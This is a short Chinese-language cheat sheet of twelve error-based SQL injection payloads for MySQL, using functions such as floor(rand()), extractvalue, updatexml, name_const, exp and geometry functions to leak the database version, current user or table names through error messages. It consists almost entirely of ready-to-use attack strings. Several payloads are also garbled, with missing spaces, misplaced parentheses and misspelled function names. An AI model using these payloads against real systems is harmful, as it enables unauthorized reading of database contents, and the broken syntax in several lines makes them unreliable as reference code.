1、通过floor报错,注入语句如下:
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);2、通过ExtractValue报错,注入语句如下:
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));3、通过UpdateXml报错,注入语句如下:
and 1=(updatexml(1,concat(0x3a,(selectuser())),1))4、通过NAME_CONST报错,注入语句如下:
and exists(select*from (select*from(selectname_const(@@version,0))a join (select name_const(@@version,0))b)c)5、通过join报错,注入语句如下:
select * from(select * from mysql.user ajoin mysql.user b)c;6、通过exp报错,注入语句如下:
and exp(~(select * from (select user () ) a) );7、通过GeometryCollection()报错,注入语句如下:
and GeometryCollection(()select *from(select user () )a)b );8、通过polygon ()报错,注入语句如下:
and polygon (()select * from(select user ())a)b );9、通过multipoint ()报错,注入语句如下:
and multipoint (()select * from(select user() )a)b );10、通过multlinestring ()报错,注入语句如下:
and multlinestring (()select * from(selectuser () )a)b );11、通过multpolygon ()报错,注入语句如下:
and multpolygon (()select * from(selectuser () )a)b );12、通过linestring ()报错,注入语句如下:
and linestring (()select * from(select user() )a)b );